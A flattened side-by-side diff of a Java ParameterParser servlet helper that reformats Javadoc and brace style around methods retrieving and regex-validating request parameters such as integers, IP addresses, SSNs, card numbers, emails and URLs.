*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a byte * @return the parameter value as a byte
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter value could not be * if the parameter was not found
* converted to a byte * @exception NumberFormatException
* if the parameter value could not be converted to a byte
*/ */
public byte getByteParameter(String name) public byte getByteParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return Byte.parseByte(getStringParameter(name)); return Byte.parseByte(getStringParameter(name));
} }
/** /**
* Gets the named parameter value as a byte, with a default. Returns the * Gets the named parameter value as a byte, with a default. Returns the
* default value if the parameter is not found or cannot be converted to a * default value if the parameter is not found or cannot be converted to a
* byte. * byte.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a byte, or the default * @return the parameter value as a byte, or the default
*/ */
public byte getByteParameter(String name, byte def) public byte getByteParameter(String name, byte def)
@ -182,14 +187,14 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a char * Gets the named parameter value as a char
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a char * @return the parameter value as a char
*@exception ParameterNotFoundException if the parameter was not found or was * @exception ParameterNotFoundException
* the empty string * if the parameter was not found or was the empty string
*/ */
public char getCharParameter(String name) throws ParameterNotFoundException public char getCharParameter(String name) throws ParameterNotFoundException
{ {
@ -198,20 +203,20 @@ public class ParameterParser
if (param.length() == 0) if (param.length() == 0)
{ {
throw new ParameterNotFoundException(name + " is empty string"); throw new ParameterNotFoundException(name + " is empty string");
} } else
else
{ {
return (param.charAt(0)); return (param.charAt(0));
} }
} }
/** /**
* Gets the named parameter value as a char, with a default. Returns the * Gets the named parameter value as a char, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a char, or the default * @return the parameter value as a char, or the default
*/ */
public char getCharParameter(String name, char def) public char getCharParameter(String name, char def)
@ -226,15 +231,14 @@ public class ParameterParser
} }
} }
/** /**
* Gets the classNameParameter attribute of the ParameterParser object * Gets the classNameParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
* Description of the Parameter
* @return The classNameParameter value * @return The classNameParameter value
*/ */
public String getClassNameParameter(String name) public String getClassNameParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String p = getStringParameter(name); String p = getStringParameter(name);
StringTokenizer st = new StringTokenizer(p); StringTokenizer st = new StringTokenizer(p);
@ -242,14 +246,15 @@ public class ParameterParser
return (st.nextToken().trim()); return (st.nextToken().trim());
} }
// FIXME: check for [a-zA-Z].([a-zA-Z])* // FIXME: check for [a-zA-Z].([a-zA-Z])*
/** /**
* Gets the classNameParameter attribute of the ParameterParser object * Gets the classNameParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
*@param def Description of the Parameter * Description of the Parameter
* @param def
* Description of the Parameter
* @return The classNameParameter value * @return The classNameParameter value
*/ */
public String getClassNameParameter(String name, String def) public String getClassNameParameter(String name, String def)
@ -264,29 +269,30 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a double * Gets the named parameter value as a double
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a double * @return the parameter value as a double
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a double * @exception NumberFormatException
* if the parameter could not be converted to a double
*/ */
public double getDoubleParameter(String name) public double getDoubleParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return new Double(getStringParameter(name)).doubleValue(); return new Double(getStringParameter(name)).doubleValue();
} }
/** /**
* Gets the named parameter value as a double, with a default. Returns the * Gets the named parameter value as a double, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a double, or the default * @return the parameter value as a double, or the default
*/ */
public double getDoubleParameter(String name, double def) public double getDoubleParameter(String name, double def)
@ -301,29 +307,30 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a float * Gets the named parameter value as a float
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a float * @return the parameter value as a float
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a float * @exception NumberFormatException
* if the parameter could not be converted to a float
*/ */
public float getFloatParameter(String name) public float getFloatParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return new Float(getStringParameter(name)).floatValue(); return new Float(getStringParameter(name)).floatValue();
} }
/** /**
* Gets the named parameter value as a float, with a default. Returns the * Gets the named parameter value as a float, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a float, or the default * @return the parameter value as a float, or the default
*/ */
public float getFloatParameter(String name, float def) public float getFloatParameter(String name, float def)
@ -338,13 +345,14 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as an IP String, with a default. Returns the * Gets the named parameter value as an IP String, with a default. Returns
* default value if the parameter is not found or is the empty string. * the default value if the parameter is not found or is the empty string.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a String, or the default * @return the parameter value as a String, or the default
*/ */
public String getIPParameter(String name, String def) public String getIPParameter(String name, String def)
@ -359,15 +367,15 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as an IP String * Gets the named parameter value as an IP String
* *
*@param name the parameter name * @param name
*@return the parameter value as a valid IP * the parameter name
* String or an Empty string if invalid * @return the parameter value as a valid IP String or an Empty string if
*@exception ParameterNotFoundException if the parameter was not found or was * invalid
* the empty string * @exception ParameterNotFoundException
* if the parameter was not found or was the empty string
*/ */
public String getIPParameter(String name) throws ParameterNotFoundException public String getIPParameter(String name) throws ParameterNotFoundException
{ {
@ -378,12 +386,10 @@ public class ParameterParser
if (values == null) if (values == null)
{ {
throw new ParameterNotFoundException(name + " not found"); throw new ParameterNotFoundException(name + " not found");
} } else if (values[0].length() == 0)
else if (values[0].length() == 0)
{ {
throw new ParameterNotFoundException(name + " was empty"); throw new ParameterNotFoundException(name + " was empty");
} } else
else
{ {
// trim illegal characters // trim illegal characters
value = clean(values[0].trim()); value = clean(values[0].trim());
@ -432,8 +438,7 @@ public class ParameterParser
octetCount++; octetCount++;
} }
} } else
else
{ {
// Not a valid IP // Not a valid IP
valid = false; valid = false;
@ -450,29 +455,30 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a int * Gets the named parameter value as a int
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a int * @return the parameter value as a int
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a int * @exception NumberFormatException
* if the parameter could not be converted to a int
*/ */
public int getIntParameter(String name) throws ParameterNotFoundException, public int getIntParameter(String name) throws ParameterNotFoundException, NumberFormatException
NumberFormatException
{ {
return Integer.parseInt(getStringParameter(name)); return Integer.parseInt(getStringParameter(name));
} }
/** /**
* Gets the named parameter value as a int, with a default. Returns the * Gets the named parameter value as a int, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a int, or the default * @return the parameter value as a int, or the default
*/ */
public int getIntParameter(String name, int def) public int getIntParameter(String name, int def)
@ -487,29 +493,30 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a long * Gets the named parameter value as a long
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a long * @return the parameter value as a long
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a long * @exception NumberFormatException
* if the parameter could not be converted to a long
*/ */
public long getLongParameter(String name) public long getLongParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return Long.parseLong(getStringParameter(name)); return Long.parseLong(getStringParameter(name));
} }
/** /**
* Gets the named parameter value as a long, with a default. Returns the * Gets the named parameter value as a long, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a long, or the default * @return the parameter value as a long, or the default
*/ */
public long getLongParameter(String name, long def) public long getLongParameter(String name, long def)
@ -524,14 +531,13 @@ public class ParameterParser
} }
} }
/** /**
* Determines which of the required parameters were missing from the request. * Determines which of the required parameters were missing from the
* Returns null if all the parameters are present. * request. Returns null if all the parameters are present.
* *
*@param requestuired Description of the Parameter * @param requestuired
*@return an array of missing parameters, or null if none are * Description of the Parameter
* missing * @return an array of missing parameters, or null if none are missing
*/ */
public String[] getMissingParameters(String[] requestuired) public String[] getMissingParameters(String[] requestuired)
{ {
@ -550,8 +556,7 @@ public class ParameterParser
if (missing.size() == 0) if (missing.size() == 0)
{ {
return null; return null;
} } else
else
{ {
String[] ret = new String[missing.size()]; String[] ret = new String[missing.size()];
missing.copyInto(ret); missing.copyInto(ret);
@ -560,7 +565,6 @@ public class ParameterParser
} }
} }
/** /**
* Gets the parameterNames attribute of the ParameterParser object * Gets the parameterNames attribute of the ParameterParser object
* *
@ -576,11 +580,11 @@ public class ParameterParser
return request.getParameterNames(); return request.getParameterNames();
} }
/** /**
* Gets the parameterValues attribute of the ParameterParser object * Gets the parameterValues attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
* Description of the Parameter
* @return The parameterValues value * @return The parameterValues value
*/ */
public String[] getParameterValues(String name) public String[] getParameterValues(String name)
@ -593,12 +597,13 @@ public class ParameterParser
return request.getParameterValues(name); return request.getParameterValues(name);
} }
/** /**
* Gets the rawParameter attribute of the ParameterParser object * Gets the rawParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
*@param def Description of the Parameter * Description of the Parameter
* @param def
* Description of the Parameter
* @return The rawParameter value * @return The rawParameter value
*/ */
public String getRawParameter(String name, String def) public String getRawParameter(String name, String def)
@ -613,24 +618,23 @@ public class ParameterParser
} }
} }
/** /**
* Gets the rawParameter attribute of the ParameterParser object * Gets the rawParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
* Description of the Parameter
* @return The rawParameter value * @return The rawParameter value
*@exception ParameterNotFoundException Description of the Exception * @exception ParameterNotFoundException
* Description of the Exception
*/ */
public String getRawParameter(String name) public String getRawParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String[] values = request.getParameterValues(name); String[] values = request.getParameterValues(name);
if (values == null) if (values == null)
{ {
throw new ParameterNotFoundException(name + " not found"); throw new ParameterNotFoundException(name + " not found");
} } else if (values[0].length() == 0)
else if (values[0].length() == 0)
{ {
throw new ParameterNotFoundException(name + " was empty"); throw new ParameterNotFoundException(name + " was empty");
} }
@ -638,29 +642,30 @@ public class ParameterParser
return (values[0]); return (values[0]);
} }
/** /**
* Gets the named parameter value as a short * Gets the named parameter value as a short
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a short * @return the parameter value as a short
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a short * @exception NumberFormatException
* if the parameter could not be converted to a short
*/ */
public short getShortParameter(String name) public short getShortParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return Short.parseShort(getStringParameter(name)); return Short.parseShort(getStringParameter(name));
} }
/** /**
* Gets the named parameter value as a short, with a default. Returns the * Gets the named parameter value as a short, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a short, or the default * @return the parameter value as a short, or the default
*/ */
public short getShortParameter(String name, short def) public short getShortParameter(String name, short def)
@ -675,17 +680,16 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a String * Gets the named parameter value as a String
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a String * @return the parameter value as a String
*@exception ParameterNotFoundException if the parameter was not found or was * @exception ParameterNotFoundException
* the empty string * if the parameter was not found or was the empty string
*/ */
public String getStringParameter(String name) public String getStringParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String[] values = request.getParameterValues(name); String[] values = request.getParameterValues(name);
String value; String value;
@ -693,12 +697,10 @@ public class ParameterParser
if (values == null) if (values == null)
{ {
throw new ParameterNotFoundException(name + " not found"); throw new ParameterNotFoundException(name + " not found");
} } else if (values[0].length() == 0)
else if (values[0].length() == 0)
{ {
throw new ParameterNotFoundException(name + " was empty"); throw new ParameterNotFoundException(name + " was empty");
} } else
else
{ {
// trim illegal characters // trim illegal characters
value = clean(values[0].trim()); value = clean(values[0].trim());
@ -713,13 +715,14 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a String, with a default. Returns the * Gets the named parameter value as a String, with a default. Returns the
* default value if the parameter is not found or is the empty string. * default value if the parameter is not found or is the empty string.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a String, or the default * @return the parameter value as a String, or the default
*/ */
public String getStringParameter(String name, String def) public String getStringParameter(String name, String def)
@ -734,13 +737,15 @@ public class ParameterParser
} }
} }
/** /**
* Gets the subParameter attribute of the ParameterParser object * Gets the subParameter attribute of the ParameterParser object
* *
*@param first Description of the Parameter * @param first
*@param next Description of the Parameter * Description of the Parameter
*@param def Description of the Parameter * @param next
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The subParameter value * @return The subParameter value
*/ */
public String getSubParameter(String first, String next, String def) public String getSubParameter(String first, String next, String def)
@ -755,18 +760,19 @@ public class ParameterParser
} }
} }
/** /**
* Gets the parameter named 'next' following the parameter 'first'. Presumes * Gets the parameter named 'next' following the parameter 'first'. Presumes
* the structure: first=firstvalue&next=nextValue * the structure: first=firstvalue&next=nextValue
* *
*@param first Description of the Parameter * @param first
*@param next Description of the Parameter * Description of the Parameter
* @param next
* Description of the Parameter
* @return The subParameter value * @return The subParameter value
*@exception ParameterNotFoundException Description of the Exception * @exception ParameterNotFoundException
* Description of the Exception
*/ */
public String getSubParameter(String first, String next) public String getSubParameter(String first, String next) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String[] values = request.getParameterValues(first); String[] values = request.getParameterValues(first);
String value; String value;
@ -774,12 +780,10 @@ public class ParameterParser
if (values == null) if (values == null)
{ {
throw new ParameterNotFoundException(first + " not found"); throw new ParameterNotFoundException(first + " not found");
} } else if (values[0].length() == 0)
else if (values[0].length() == 0)
{ {
throw new ParameterNotFoundException(first + " was empty"); throw new ParameterNotFoundException(first + " was empty");
} } else
else
{ {
value = clean(values[0].trim()); value = clean(values[0].trim());
@ -793,10 +797,12 @@ public class ParameterParser
value = value.substring(idx); value = value.substring(idx);
//System.out.println("= = = = = =Parameter parser looking for " + next + " in " + value ); // System.out.println("= = = = = =Parameter parser looking for " +
// next + " in " + value );
int nextValueIndex = value.indexOf(next + "="); int nextValueIndex = value.indexOf(next + "=");
//System.out.println("= = = = = =Parameter parser nextValueIndex = " + nextValueIndex ); // System.out.println("= = = = = =Parameter parser nextValueIndex =
// " + nextValueIndex );
if (nextValueIndex < 0) if (nextValueIndex < 0)
{ {
throw new ParameterNotFoundException("No subparameter value"); throw new ParameterNotFoundException("No subparameter value");
@ -807,8 +813,7 @@ public class ParameterParser
if (nextValueIndex >= 0) if (nextValueIndex >= 0)
{ {
value = value.substring(nextValueIndex); value = value.substring(nextValueIndex);
} } else
else
{ {
throw new ParameterNotFoundException(next + " not found"); throw new ParameterNotFoundException(next + " not found");
} }
@ -820,19 +825,19 @@ public class ParameterParser
value = value.substring(0, value.indexOf("&")); value = value.substring(0, value.indexOf("&"));
} }
//System.out.println("=-=-=-=-=ParameterParser returning value " + value ); // System.out.println("=-=-=-=-=ParameterParser returning value " +
// value );
return value; return value;
} }
/** /**
* Gets the wordParameter attribute of the ParameterParser object * Gets the wordParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
* Description of the Parameter
* @return The wordParameter value * @return The wordParameter value
*/ */
public String getWordParameter(String name) public String getWordParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String p = getStringParameter(name); String p = getStringParameter(name);
StringTokenizer st = new StringTokenizer(p); StringTokenizer st = new StringTokenizer(p);
@ -840,14 +845,15 @@ public class ParameterParser
return (st.nextToken().trim()); return (st.nextToken().trim());
} }
// FIXME: check for [a-zA-Z] // FIXME: check for [a-zA-Z]
/** /**
* Gets the wordParameter attribute of the ParameterParser object * Gets the wordParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
*@param def Description of the Parameter * Description of the Parameter
* @param def
* Description of the Parameter
* @return The wordParameter value * @return The wordParameter value
*/ */
public String getWordParameter(String name, String def) public String getWordParameter(String name, String def)
@ -862,18 +868,22 @@ public class ParameterParser
} }
} }
/** /**
* Gets the specified parameter from the request and validates it against the provided regular expression. * Gets the specified parameter from the request and validates it against
* If the regular expression check fails, the default value is returned instead. * the provided regular expression. If the regular expression check fails,
* the default value is returned instead.
* *
*@param name The name of the parameter to retrieve from the request. * @param name
*@param def The default value of the parameter. * The name of the parameter to retrieve from the request.
*@param regexpattern The precompiled regular expression to be used to validate the parameter. * @param def
*@return The validated parameter value, or the default value if validation failed. * The default value of the parameter.
* @param regexpattern
* The precompiled regular expression to be used to validate the
* parameter.
* @return The validated parameter value, or the default value if validation
* failed.
*/ */
private String getRegexParameter(String name, String def, private String getRegexParameter(String name, String def, Pattern regexpattern) throws ValidationException
Pattern regexpattern) throws ValidationException
{ {
try try
{ {
@ -887,35 +897,38 @@ public class ParameterParser
} }
} }
/** /**
* Gets the specified parameter from the request and validates it against the provided regular expression. * Gets the specified parameter from the request and validates it against
* If the regular expression check fails, the default value is returned instead. * the provided regular expression. If the regular expression check fails,
* the default value is returned instead.
* *
*@param name The name of the parameter to retrieve from the request. * @param name
*@param def The default value of the parameter. * The name of the parameter to retrieve from the request.
*@param regexpattern The precompiled regular expression to be used to validate the parameter. * @param def
*@return The validated parameter value, or the default value if validation failed. * The default value of the parameter.
* @param regexpattern
* The precompiled regular expression to be used to validate the
* parameter.
* @return The validated parameter value, or the default value if validation
* failed.
*/ */
private String getRegexParameter(String name, Pattern regexpattern) private String getRegexParameter(String name, Pattern regexpattern) throws ParameterNotFoundException,
throws ParameterNotFoundException, ValidationException ValidationException
{ {
String param = getStringParameter(name); String param = getStringParameter(name);
if (regexpattern.matcher(param).matches()) if (regexpattern.matcher(param).matches())
{ {
return param; return param;
} } else
else
{ {
// System.out.println(param + " didn't match defined pattern."); // System.out.println(param + " didn't match defined pattern.");
throw new ValidationException(name + " contained an invalid value"); throw new ValidationException(name + " contained an invalid value");
} }
} }
public String getStrictAlphaParameter(String name, int maxLength) throws ParameterNotFoundException,
public String getStrictAlphaParameter(String name, int maxLength) ValidationException
throws ParameterNotFoundException, ValidationException
{ {
String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$"; String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$";
Pattern alphaPattern = Pattern.compile(alphaRegEx); Pattern alphaPattern = Pattern.compile(alphaRegEx);
@ -923,9 +936,8 @@ public class ParameterParser
return getRegexParameter(name, alphaPattern); return getRegexParameter(name, alphaPattern);
} }
public String getStrictNumericParameter(String name, int maxLength) throws ParameterNotFoundException,
public String getStrictNumericParameter(String name, int maxLength) ValidationException
throws ParameterNotFoundException, ValidationException
{ {
String numericRegEx = "^\\d{0," + maxLength + "}$"; String numericRegEx = "^\\d{0," + maxLength + "}$";
Pattern numericPattern = Pattern.compile(numericRegEx); Pattern numericPattern = Pattern.compile(numericRegEx);
@ -937,22 +949,20 @@ public class ParameterParser
private static final Pattern Ssnpattern = Pattern.compile(SSNREGEX); private static final Pattern Ssnpattern = Pattern.compile(SSNREGEX);
public String getSsnParameter(String name) throws ParameterNotFoundException, ValidationException
public String getSsnParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getRegexParameter(name, Ssnpattern); return getRegexParameter(name, Ssnpattern);
} }
// Validates format for major brands of credit card. // Validates format for major brands of credit card.
//private static final String CCNREGEX = "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([ -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$"; // private static final String CCNREGEX =
// "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([
// -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
private static final String CCNREGEX = "^\\d{16}$"; private static final String CCNREGEX = "^\\d{16}$";
private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX); private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX);
public String getCcnParameter(String name) throws ParameterNotFoundException, ValidationException
public String getCcnParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getRegexParameter(name, Ccnpattern); return getRegexParameter(name, Ccnpattern);
} }
@ -961,16 +971,12 @@ public class ParameterParser
private static final Pattern Zippattern = Pattern.compile(ZIPREGEX); private static final Pattern Zippattern = Pattern.compile(ZIPREGEX);
public String getZipParameter(String name) throws ParameterNotFoundException, ValidationException
public String getZipParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getZipParameter(name, null); return getZipParameter(name, null);
} }
public String getZipParameter(String name, String def) throws ValidationException
public String getZipParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, Zippattern); return getRegexParameter(name, def, Zippattern);
} }
@ -981,16 +987,12 @@ public class ParameterParser
// private static final String PHONEREGEX = "^([\\-()+ 0-9x])+$"; // private static final String PHONEREGEX = "^([\\-()+ 0-9x])+$";
private static final Pattern phonepattern = Pattern.compile(PHONEREGEX); private static final Pattern phonepattern = Pattern.compile(PHONEREGEX);
public String getPhoneParameter(String name) throws ParameterNotFoundException, ValidationException
public String getPhoneParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getPhoneParameter(name, null); return getPhoneParameter(name, null);
} }
public String getPhoneParameter(String name, String def) throws ValidationException
public String getPhoneParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, phonepattern); return getRegexParameter(name, def, phonepattern);
} }
@ -999,16 +1001,12 @@ public class ParameterParser
private static final Pattern emailpattern = Pattern.compile(EMAILREGEX); private static final Pattern emailpattern = Pattern.compile(EMAILREGEX);
public String getEMailParameter(String name) throws ParameterNotFoundException, ValidationException
public String getEMailParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getEMailParameter(name, null); return getEMailParameter(name, null);
} }
public String getEMailParameter(String name, String def) throws ValidationException
public String getEMailParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, emailpattern); return getRegexParameter(name, def, emailpattern);
} }
@ -1017,45 +1015,36 @@ public class ParameterParser
private static final Pattern datepattern = Pattern.compile(DATEREGEX); private static final Pattern datepattern = Pattern.compile(DATEREGEX);
public String getDateParameter(String name) throws ParameterNotFoundException, ValidationException
public String getDateParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getDateParameter(name, null); return getDateParameter(name, null);
} }
public String getDateParameter(String name, String def) throws ValidationException
public String getDateParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, datepattern); return getRegexParameter(name, def, datepattern);
} }
private static final String URLREGEX = "^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$"; private static final String URLREGEX =
"^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
private static final Pattern URLpattern = Pattern.compile(URLREGEX); private static final Pattern URLpattern = Pattern.compile(URLREGEX);
public String getURLParameter(String name) throws ParameterNotFoundException, ValidationException
public String getURLParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getURLParameter(name, null); return getURLParameter(name, null);
} }
public String getURLParameter(String name, String def) throws ValidationException
public String getURLParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, URLpattern); return getRegexParameter(name, def, URLpattern);
} }
protected static String htmlEncode(String s) protected static String htmlEncode(String s)
{ {
return HtmlEncoder.encode(s); return HtmlEncoder.encode(s);
} }
/** /**
* Description of the Method * Description of the Method
* *
@ -1083,11 +1072,11 @@ public class ParameterParser
return (s.toString()); return (s.toString());
} }
/** /**
* Description of the Method * Description of the Method
* *
*@param request Description of the Parameter * @param request
* Description of the Parameter
*/ */
public void update(ServletRequest request) public void update(ServletRequest request)
{ {